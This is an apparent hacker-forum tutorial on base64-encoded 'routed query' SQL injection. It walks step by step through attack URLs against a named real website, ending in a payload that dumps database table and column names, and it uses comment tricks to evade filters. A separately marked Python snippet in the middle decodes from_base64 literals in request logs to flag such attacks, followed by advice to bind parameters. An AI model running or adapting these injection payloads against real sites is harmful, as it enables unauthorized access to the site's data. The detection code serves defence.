Base64 Based Routed Query By Kashmiri_Wolf
Tutorial On Base64 Based Routed Query By Kashmiri_Wolf
This Is Kashmiri_Wolf. Today I Am Gonna Write About Base64 Based Routed Query.
We Will Use A New Function Here (New For Newbies Like Me),
Which Is "from_base64()".
So Let's Get Straight To It:
Here Is The Site:
http://www.egytravelcorner.com/ar/articals-more.php?id=1
It's A Basic Injection Till Dios, So Here Is The Query For The Vuln Column:
http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(1),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384
Here Routed Query Is A Way To Dios It (For Pure Union Based And $_GET Method).
Hex Is Allowed Here, But We Will Use Base64 Routed Query Here. Let's Start...
http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384
Here Is The Error For The Routed Query. Let's Fix The Query And Get The Total Number Of Columns (Column Count)
http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384
Query Balanced. Let's Check For Order By
http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDktLSAtKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384
No Error
http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDEwLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384
9 Columns. Let's Check For The Vuln Column
http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KC4xJyAgVW5pb24gU2VsZWN0IDEsMiwzLDQsNSw2LDcsOCw5OS0tIC0p')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384
Vuln Column Is Under Image
Let's Dios:
http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(FROM_BASE64('KDEnLyoqXyoqLy8qITUwMDAwVW5pb24qL1NlbGVjdCAxMTEsMjIyLDMzMzMsY29uY2F0LyoqXyoqLygweDIyMmYzZTNjNjI3MjNlM2MyZjY0Njk3NjNlM2MyZjc0NjE2MjZjNjUzZTNjMmY3MDNlM2M2NjZmNmU3NDIwNjM2ZjZjNmY3MjNkNzI2NTY0MjA2NjYxNjM2NTNkNjM2MTZkNjI3MjY5NjEyMDczNjk3YTY1M2QzMzNlLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApKSw1NjYsNjY2LDc3Nyw4ODgsOTk5LS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384
So Here Is Our Final Query!
Keeping The Concept In Mind, You Can Also Do The Same With Char, I Guess (Not Tested Yet!!)
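In every request above, the inner SQL text sits inside a from_base64('...') literal, so it is not visible in the raw URL until the literal is decoded. The following is an added detection example, not code from the original post: it decodes those literals in logged request URLs and flags the ones that carry SQL. The host, path, function names and patterns are assumptions; the sample URLs are constructed and reuse two of the literals shown on this page.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# from_base64('<literal>') in any letter case, as it appears in a request URL.
B64_CALL = re.compile(r"from_base64\s*\(\s*'([A-Za-z0-9+/]+={0,2})'\s*\)", re.I)
# MySQL comment markers (/* */ and /*!NNNNN */) that can split keywords.
COMMENT = re.compile(r"/\*!?\d*|\*/")
# SQL syntax that has no business inside a decoded request parameter.
INNER_SQL = re.compile(
    r"\bunion\b|\bselect\b|\border\s+by\b|information_schema|--|'", re.I)

def decode_literals(url):
    """Return the decoded text of every from_base64('...') literal in a URL."""
    decoded = []
    for literal in B64_CALL.findall(unquote(url)):  # unquote turns %27 into '
        try:
            raw = base64.b64decode(literal, validate=True)
        except (binascii.Error, ValueError):
            continue  # bad length or padding: not base64, nothing to inspect
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

def flag_request(url):
    """Return the decoded literals that contain SQL once comments are stripped."""
    return [text for text in decode_literals(url)
            if INNER_SQL.search(COMMENT.sub(" ", text))]

def scan(urls):
    """Map each flagged URL to the SQL text recovered from it."""
    return {u: hits for u in urls if (hits := flag_request(u))}

# Constructed log entries: placeholder host and path, literals taken from this page.
SAMPLE_URLS = [
    "http://app.example.test/a.php?id=1%27/*!00000Union*/"
    "(Select(from_base64(%27KDEnKQ==%27)),(2))--%20-",
    "http://app.example.test/a.php?id=1'/*!00000Union*/"
    "(Select(FROM_BASE64('KDEnIG9yZGVyIGJ5IDktLSAtKQ==')),(2))-- -",
    "http://app.example.test/a.php?note=from_base64('aGVsbG8=')",  # decodes to plain text
    "http://app.example.test/a.php?id=7",
]

if __name__ == "__main__":
    for url, hits in scan(SAMPLE_URLS).items():
        print(hits, "<-", url)
```

Detection is a second line of defence; binding the id value as a query parameter in both queries removes the injection point the requests depend on.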
Credits To ~~> Master Benzi,Khexan Ro0t,Master Janus,Makman,Ajkaro,Rahul Maini,Raz
Sorry For Bad Explanation ........ If Any Problem You Can Pm Me Here Kashmiri_Wolf
Thanks To Sqli-Basic For Letting Me Share This :)
Regards :
Kashmiri_Wolf